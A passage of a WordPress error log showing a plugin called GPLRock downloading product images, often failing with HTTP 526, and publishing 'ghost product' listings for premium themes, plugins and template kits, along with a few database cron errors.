shop-shopping-cart-apis-modules-for-stock-manager-advance after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 02:15:15 UTC] GPLRock WARNING: Image download failed for product shop-shopping-cart-apis-modules-for-stock-manager-advance. URL: https://meldwp.com/wp-content/uploads/shop-shopping-cart--apis-modules-for-stock-manager-advance-20213.webp [05-Apr-2026 02:15:15 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: shop-shopping-cart-apis-modules-for-stock-manager-advance [05-Apr-2026 02:15:15 UTC] GPLRock: Image download failed for product network-merchants-collectjs-payment-gateway-for-woocommerce (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:15:17 UTC] GPLRock: Image download failed for product network-merchants-collectjs-payment-gateway-for-woocommerce (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:15:19 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/network-merchants-collectjs-payment-gateway-for-woocommerce-33381.webp for product network-merchants-collectjs-payment-gateway-for-woocommerce after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 02:15:19 UTC] GPLRock: Image download failed for product network-merchants-collectjs-payment-gateway-for-woocommerce (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:15:21 UTC] GPLRock: Image download failed for product network-merchants-collectjs-payment-gateway-for-woocommerce (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:15:23 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/network-merchants-collectjs-payment-gateway-for-woocommerce-33381.webp for product network-merchants-collectjs-payment-gateway-for-woocommerce after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 02:15:23 UTC] GPLRock WARNING: Image download failed for product network-merchants-collectjs-payment-gateway-for-woocommerce. URL: https://meldwp.com/wp-content/uploads/network-merchants-collectjs-payment-gateway-for-woocommerce-33381.webp [05-Apr-2026 02:15:23 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: network-merchants-collectjs-payment-gateway-for-woocommerce [05-Apr-2026 02:15:23 UTC] GPLRock: Image download failed for product wordpress-menu-plugin-superfly-responsive-menu (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:15:26 UTC] GPLRock: Image download failed for product wordpress-menu-plugin-superfly-responsive-menu (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:15:28 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/wordpress-menu-plugin--superfly-responsive-menu-27292.webp for product wordpress-menu-plugin-superfly-responsive-menu after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 02:15:28 UTC] GPLRock: Image download failed for product wordpress-menu-plugin-superfly-responsive-menu (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:15:30 UTC] GPLRock: Image download failed for product wordpress-menu-plugin-superfly-responsive-menu (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:15:32 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/wordpress-menu-plugin--superfly-responsive-menu-27292.webp for product wordpress-menu-plugin-superfly-responsive-menu after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 02:15:32 UTC] GPLRock WARNING: Image download failed for product wordpress-menu-plugin-superfly-responsive-menu. URL: https://meldwp.com/wp-content/uploads/wordpress-menu-plugin--superfly-responsive-menu-27292.webp [05-Apr-2026 02:15:32 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: wordpress-menu-plugin-superfly-responsive-menu [05-Apr-2026 02:16:16 UTC] GPLRock: Image downloaded successfully for product graph-paper-press-sell-media-download-lightbox (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-db91abe0.jpg [05-Apr-2026 02:16:16 UTC] GPLRock: Using pre-downloaded image for product graph-paper-press-sell-media-download-lightbox: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-db91abe0.jpg [05-Apr-2026 02:16:16 UTC] GPLRock: Ghost product published with image - Product ID: graph-paper-press-sell-media-download-lightbox [05-Apr-2026 02:16:17 UTC] GPLRock: Image downloaded successfully for product studiopress-essence-pro-genesis-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-0a7fd6c6.jpg [05-Apr-2026 02:16:18 UTC] GPLRock: Using pre-downloaded image for product studiopress-essence-pro-genesis-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-0a7fd6c6.jpg [05-Apr-2026 02:16:18 UTC] GPLRock: Ghost product published with image - Product ID: studiopress-essence-pro-genesis-wordpress-theme [05-Apr-2026 02:16:19 UTC] GPLRock: Image downloaded successfully for product hreflang-manager-wordpress-plugin (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-07e0521e.jpg [05-Apr-2026 02:16:19 UTC] GPLRock: Using pre-downloaded image for product hreflang-manager-wordpress-plugin: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-07e0521e.jpg [05-Apr-2026 02:16:19 UTC] GPLRock: Ghost product published with image - Product ID: hreflang-manager-wordpress-plugin [05-Apr-2026 02:16:20 UTC] GPLRock: Image downloaded successfully for product forgravity-live-population-for-gravity-forms (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-41312159.jpg [05-Apr-2026 02:16:21 UTC] GPLRock: Using pre-downloaded image for product forgravity-live-population-for-gravity-forms: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-41312159.jpg [05-Apr-2026 02:16:21 UTC] GPLRock: Ghost product published with image - Product ID: forgravity-live-population-for-gravity-forms [05-Apr-2026 02:16:22 UTC] GPLRock: Image downloaded successfully for product pro-news-ticker-marquee-for-visual-composer (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-fe41dabb.jpg [05-Apr-2026 02:16:22 UTC] GPLRock: Using pre-downloaded image for product pro-news-ticker-marquee-for-visual-composer: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-fe41dabb.jpg [05-Apr-2026 02:16:22 UTC] GPLRock: Ghost product published with image - Product ID: pro-news-ticker-marquee-for-visual-composer [05-Apr-2026 02:16:24 UTC] GPLRock: Image downloaded successfully for product restrict-content-pro-group-accounts (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-dd73844e.jpg [05-Apr-2026 02:16:24 UTC] GPLRock: Using pre-downloaded image for product restrict-content-pro-group-accounts: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-dd73844e.jpg [05-Apr-2026 02:16:24 UTC] GPLRock: Ghost product published with image - Product ID: restrict-content-pro-group-accounts [05-Apr-2026 02:16:25 UTC] GPLRock: Image downloaded successfully for product envira-gallery-breadcrumbs-addon (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-163b793b.jpg [05-Apr-2026 02:16:26 UTC] GPLRock: Using pre-downloaded image for product envira-gallery-breadcrumbs-addon: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-163b793b.jpg [05-Apr-2026 02:16:26 UTC] GPLRock: Ghost product published with image - Product ID: envira-gallery-breadcrumbs-addon [05-Apr-2026 02:16:27 UTC] GPLRock: Image downloaded successfully for product mythemeshop-repose-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-6f26dfcf.jpg [05-Apr-2026 02:16:27 UTC] GPLRock: Using pre-downloaded image for product mythemeshop-repose-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-6f26dfcf.jpg [05-Apr-2026 02:16:27 UTC] GPLRock: Ghost product published with image - Product ID: mythemeshop-repose-wordpress-theme [05-Apr-2026 02:16:29 UTC] GPLRock: Image downloaded successfully for product core-minimalist-photography-portfolio (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-c3e03d20.jpg [05-Apr-2026 02:16:29 UTC] GPLRock: Using pre-downloaded image for product core-minimalist-photography-portfolio: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-c3e03d20.jpg [05-Apr-2026 02:16:29 UTC] GPLRock: Ghost product published with image - Product ID: core-minimalist-photography-portfolio [05-Apr-2026 02:16:31 UTC] GPLRock: Image downloaded successfully for product woocommerce-sage-payments-usa (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-1972a4b9.jpg [05-Apr-2026 02:16:31 UTC] GPLRock: Using pre-downloaded image for product woocommerce-sage-payments-usa: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-1972a4b9.jpg [05-Apr-2026 02:16:31 UTC] GPLRock: Ghost product published with image - Product ID: woocommerce-sage-payments-usa [05-Apr-2026 02:18:03 UTC] GPLRock: Image downloaded successfully for product dirtywash-dry-cleaning-laundry-service-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-575ac73e.webp [05-Apr-2026 02:18:03 UTC] GPLRock: Using pre-downloaded image for product dirtywash-dry-cleaning-laundry-service-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-575ac73e.webp [05-Apr-2026 02:18:03 UTC] GPLRock: Ghost product published with image - Product ID: dirtywash-dry-cleaning-laundry-service-elementor-template-kit [05-Apr-2026 02:18:05 UTC] GPLRock: Image downloaded successfully for product dinery-restaurant-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-7786251c.webp [05-Apr-2026 02:18:05 UTC] GPLRock: Using pre-downloaded image for product dinery-restaurant-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-7786251c.webp [05-Apr-2026 02:18:05 UTC] GPLRock: Ghost product published with image - Product ID: dinery-restaurant-elementor-template-kit [05-Apr-2026 02:18:06 UTC] GPLRock: Image downloaded successfully for product dillmill-organic-food-store-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-a1abd097.webp [05-Apr-2026 02:18:06 UTC] GPLRock: Using pre-downloaded image for product dillmill-organic-food-store-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-a1abd097.webp [05-Apr-2026 02:18:06 UTC] GPLRock: Ghost product published with image - Product ID: dillmill-organic-food-store-elementor-template-kit [05-Apr-2026 02:18:08 UTC] GPLRock: Image downloaded successfully for product dikan-creative-business-studio-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-596e2a2b.webp [05-Apr-2026 02:18:08 UTC] GPLRock: Using pre-downloaded image for product dikan-creative-business-studio-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-596e2a2b.webp [05-Apr-2026 02:18:08 UTC] GPLRock: Ghost product published with image - Product ID: dikan-creative-business-studio-elementor-template-kit [05-Apr-2026 02:18:09 UTC] GPLRock: Image downloaded successfully for product digitron-software-saas-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-1609b0b7.webp [05-Apr-2026 02:18:09 UTC] GPLRock: Using pre-downloaded image for product digitron-software-saas-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-1609b0b7.webp [05-Apr-2026 02:18:09 UTC] GPLRock: Ghost product published with image - Product ID: digitron-software-saas-elementor-template-kit [05-Apr-2026 02:18:10 UTC] GPLRock: Image downloaded successfully for product digit-robotics-technology-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-0de08cac.webp [05-Apr-2026 02:18:10 UTC] GPLRock: Using pre-downloaded image for product digit-robotics-technology-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-0de08cac.webp [05-Apr-2026 02:18:10 UTC] GPLRock: Ghost product published with image - Product ID: digit-robotics-technology-elementor-template-kit [05-Apr-2026 02:18:12 UTC] GPLRock: Image downloaded successfully for product digira-digital-agency-services-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-e2d74d91.webp [05-Apr-2026 02:18:12 UTC] GPLRock: Using pre-downloaded image for product digira-digital-agency-services-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-e2d74d91.webp [05-Apr-2026 02:18:12 UTC] GPLRock: Ghost product published with image - Product ID: digira-digital-agency-services-elementor-template-kit [05-Apr-2026 02:18:13 UTC] GPLRock: Image downloaded successfully for product digincy-digital-marketing-agency-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-4e913e38.webp [05-Apr-2026 02:18:13 UTC] GPLRock: Using pre-downloaded image for product digincy-digital-marketing-agency-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-4e913e38.webp [05-Apr-2026 02:18:13 UTC] GPLRock: Ghost product published with image - Product ID: digincy-digital-marketing-agency-elementor-template-kit [05-Apr-2026 02:18:15 UTC] GPLRock: Image downloaded successfully for product digim-seo-digital-marketing-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-80a26538.webp [05-Apr-2026 02:18:15 UTC] GPLRock: Using pre-downloaded image for product digim-seo-digital-marketing-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-80a26538.webp [05-Apr-2026 02:18:15 UTC] GPLRock: Ghost product published with image - Product ID: digim-seo-digital-marketing-template-kit [05-Apr-2026 02:18:16 UTC] GPLRock: Image downloaded successfully for product digie-digital-agency-advertising-service-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-4020460d.webp [05-Apr-2026 02:18:16 UTC] GPLRock: Using pre-downloaded image for product digie-digital-agency-advertising-service-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-4020460d.webp [05-Apr-2026 02:18:16 UTC] GPLRock: Ghost product published with image - Product ID: digie-digital-agency-advertising-service-elementor-template-kit [05-Apr-2026 02:19:31 UTC] GPLRock: Image downloaded successfully for product pipo-plumber-services-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-ae4a59b8.webp [05-Apr-2026 02:19:31 UTC] GPLRock: Using pre-downloaded image for product pipo-plumber-services-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-ae4a59b8.webp [05-Apr-2026 02:19:31 UTC] GPLRock: Ghost product published with image - Product ID: pipo-plumber-services-elementor-template-kit [05-Apr-2026 02:19:33 UTC] GPLRock: Image downloaded successfully for product pipirima-pizza-food-delivery-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-96ba1aae.jpg [05-Apr-2026 02:19:33 UTC] GPLRock: Using pre-downloaded image for product pipirima-pizza-food-delivery-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-96ba1aae.jpg [05-Apr-2026 02:19:33 UTC] GPLRock: Ghost product published with image - Product ID: pipirima-pizza-food-delivery-elementor-template-kit [05-Apr-2026 02:19:34 UTC] GPLRock: Image downloaded successfully for product pilo-painting-services-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-2259daf0.webp [05-Apr-2026 02:19:34 UTC] GPLRock: Using pre-downloaded image for product pilo-painting-services-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-2259daf0.webp [05-Apr-2026 02:19:34 UTC] GPLRock: Ghost product published with image - Product ID: pilo-painting-services-elementor-template-kit [05-Apr-2026 02:19:36 UTC] GPLRock: Image downloaded successfully for product piccaso-photography-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-00e7d33c.webp [05-Apr-2026 02:19:36 UTC] GPLRock: Using pre-downloaded image for product piccaso-photography-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-00e7d33c.webp [05-Apr-2026 02:19:36 UTC] GPLRock: Ghost product published with image - Product ID: piccaso-photography-elementor-template-kit [05-Apr-2026 02:19:37 UTC] GPLRock: Image downloaded successfully for product photoluke-photography-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-c0bd0ff6.webp [05-Apr-2026 02:19:37 UTC] GPLRock: Using pre-downloaded image for product photoluke-photography-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-c0bd0ff6.webp [05-Apr-2026 02:19:37 UTC] GPLRock: Ghost product published with image - Product ID: photoluke-photography-elementor-template-kit [05-Apr-2026 02:19:38 UTC] GPLRock: Image downloaded successfully for product photas-email-marketing-company-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-9585de94.webp [05-Apr-2026 02:19:38 UTC] GPLRock: Using pre-downloaded image for product photas-email-marketing-company-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-9585de94.webp [05-Apr-2026 02:19:38 UTC] GPLRock: Ghost product published with image - Product ID: photas-email-marketing-company-elementor-template-kit [05-Apr-2026 02:19:40 UTC] GPLRock: Image downloaded successfully for product pharmabee-pharmacy-drug-store-website-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-4fd4ed40.webp [05-Apr-2026 02:19:40 UTC] GPLRock: Using pre-downloaded image for product pharmabee-pharmacy-drug-store-website-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-4fd4ed40.webp [05-Apr-2026 02:19:40 UTC] GPLRock: Ghost product published with image - Product ID: pharmabee-pharmacy-drug-store-website-elementor-template-kit [05-Apr-2026 02:19:42 UTC] GPLRock: Image downloaded successfully for product petzy-pet-care-veterinary-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-48e1b34b.jpg [05-Apr-2026 02:19:42 UTC] GPLRock: Using pre-downloaded image for product petzy-pet-care-veterinary-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-48e1b34b.jpg [05-Apr-2026 02:19:42 UTC] GPLRock: Ghost product published with image - Product ID: petzy-pet-care-veterinary-elementor-template-kit [05-Apr-2026 02:19:43 UTC] GPLRock: Image downloaded successfully for product petto-vetenary-pet-clinic-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-e3fc034d.webp [05-Apr-2026 02:19:43 UTC] GPLRock: Using pre-downloaded image for product petto-vetenary-pet-clinic-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-e3fc034d.webp [05-Apr-2026 02:19:43 UTC] GPLRock: Ghost product published with image - Product ID: petto-vetenary-pet-clinic-template-kit [05-Apr-2026 02:19:45 UTC] GPLRock: Image downloaded successfully for product petopia-pet-care-service-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-09675a7d.jpg [05-Apr-2026 02:19:45 UTC] GPLRock: Using pre-downloaded image for product petopia-pet-care-service-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-09675a7d.jpg [05-Apr-2026 02:19:45 UTC] GPLRock: Ghost product published with image - Product ID: petopia-pet-care-service-elementor-template-kit [05-Apr-2026 02:19:49 UTC] WordPress database error Commands out of sync; you can't run this command now for query SELECT option_name, option_value FROM wpwf_options WHERE option_name IN ('_transient_doing_cron','_transient_timeout_doing_cron') made by shutdown_action_hook, do_action('shutdown'), WP_Hook->do_action, WP_Hook->apply_filters, _wp_cron, spawn_cron, get_transient, wp_prime_option_caches [05-Apr-2026 02:19:49 UTC] WordPress database error Commands out of sync; you can't run this command now for query INSERT INTO `wpwf_options` (`option_name`, `option_value`, `autoload`) VALUES ('_transient_doing_cron', '1775355589.6819939613342285156250', 'on') ON DUPLICATE KEY UPDATE `option_name` = VALUES(`option_name`), `option_value` = VALUES(`option_value`), `autoload` = VALUES(`autoload`) made by shutdown_action_hook, do_action('shutdown'), WP_Hook->do_action, WP_Hook->apply_filters, _wp_cron, spawn_cron, set_transient, add_option [05-Apr-2026 02:21:09 UTC] GPLRock: Image download failed for product multikart-ecommerce-html-admin-email-invoice-template (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:21:11 UTC] GPLRock: Image download failed for product multikart-ecommerce-html-admin-email-invoice-template (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:21:13 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/multikart---ecommerce-html--admin--email--invoice-template-30179.webp for product multikart-ecommerce-html-admin-email-invoice-template after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 02:21:13 UTC] GPLRock: Image download failed for product multikart-ecommerce-html-admin-email-invoice-template (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:21:15 UTC] GPLRock: Image download failed for product multikart-ecommerce-html-admin-email-invoice-template (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:21:17 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/multikart---ecommerce-html--admin--email--invoice-template-30179.webp for product multikart-ecommerce-html-admin-email-invoice-template after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 02:21:17 UTC] GPLRock WARNING: Image download failed for product multikart-ecommerce-html-admin-email-invoice-template. URL: https://meldwp.com/wp-content/uploads/multikart---ecommerce-html--admin--email--invoice-template-30179.webp [05-Apr-2026 02:21:17 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: multikart-ecommerce-html-admin-email-invoice-template [05-Apr-2026 02:21:17 UTC] GPLRock: Image download failed for product attorco-attorney-lawyers-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:21:19 UTC] GPLRock: Image download failed for product attorco-attorney-lawyers-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:21:21 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/attorco---attorney--lawyers-wordpress-theme-10865.webp for product attorco-attorney-lawyers-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 02:21:21 UTC] GPLRock: Image download failed for product attorco-attorney-lawyers-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:21:23 UTC] GPLRock: Image download failed for product attorco-attorney-lawyers-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:21:26 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/attorco---attorney--lawyers-wordpress-theme-10865.webp for product attorco-attorney-lawyers-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 02:21:26 UTC] GPLRock WARNING: Image download failed for product attorco-attorney-lawyers-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/attorco---attorney--lawyers-wordpress-theme-10865.webp [05-Apr-2026 02:21:26 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: attorco-attorney-lawyers-wordpress-theme [05-Apr-2026 02:21:26 UTC] GPLRock: Image download failed for product muzex-museum-wordpress-theme-rtl (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:31:35 UTC] GPLRock: Image download failed for product angela-family-planning-pregnancy-clinic-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:31:37 UTC] GPLRock: Image download failed for product angela-family-planning-pregnancy-clinic-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:31:39 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/angela--family-planning--pregnancy-clinic-wordpress-theme-23209.webp for product angela-family-planning-pregnancy-clinic-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 02:31:39 UTC] GPLRock: Image download failed for product angela-family-planning-pregnancy-clinic-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:31:41 UTC] GPLRock: Image download failed for product angela-family-planning-pregnancy-clinic-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:31:44 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/angela--family-planning--pregnancy-clinic-wordpress-theme-23209.webp for product angela-family-planning-pregnancy-clinic-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 02:31:44 UTC] GPLRock WARNING: Image download failed for product angela-family-planning-pregnancy-clinic-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/angela--family-planning--pregnancy-clinic-wordpress-theme-23209.webp [05-Apr-2026 02:31:44 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: angela-family-planning-pregnancy-clinic-wordpress-theme [05-Apr-2026 02:31:44 UTC] GPLRock: Image download failed for product spock-medical-doctor-dentist-beauty-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:31:46 UTC] GPLRock: Image download failed for product spock-medical-doctor-dentist-beauty-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:31:48 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/spock---medical-doctor-dentist--beauty-wordpress-theme-11845.webp for product spock-medical-doctor-dentist-beauty-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 02:31:48 UTC] GPLRock: Image download failed for product spock-medical-doctor-dentist-beauty-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:31:50 UTC] GPLRock: Image download failed for product spock-medical-doctor-dentist-beauty-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:31:52 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/spock---medical-doctor-dentist--beauty-wordpress-theme-11845.webp for product spock-medical-doctor-dentist-beauty-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 02:31:52 UTC] GPLRock WARNING: Image download failed for product spock-medical-doctor-dentist-beauty-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/spock---medical-doctor-dentist--beauty-wordpress-theme-11845.webp [05-Apr-2026 02:31:52 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: spock-medical-doctor-dentist-beauty-wordpress-theme [05-Apr-2026 02:31:52 UTC] GPLRock: Image download failed for product lyngva-translation-agency-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:31:54 UTC] GPLRock: Image download failed for product lyngva-translation-agency-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:41:43 UTC] GPLRock: Image download failed for product awebani-restaurant-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:41:45 UTC] GPLRock: Image download failed for product awebani-restaurant-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:41:47 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/awebani---restaurant-wordpress-theme-32079.webp for product awebani-restaurant-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 02:41:47 UTC] GPLRock: Image download failed for product awebani-restaurant-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:41:49 UTC] GPLRock: Image download failed for product awebani-restaurant-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:41:51 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/awebani---restaurant-wordpress-theme-32079.webp for product awebani-restaurant-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 02:41:51 UTC] GPLRock WARNING: Image download failed for product awebani-restaurant-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/awebani---restaurant-wordpress-theme-32079.webp [05-Apr-2026 02:41:51 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: awebani-restaurant-wordpress-theme [05-Apr-2026 02:41:51 UTC] GPLRock: Image download failed for product notify-notification-email-themebuilder-access (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:41:53 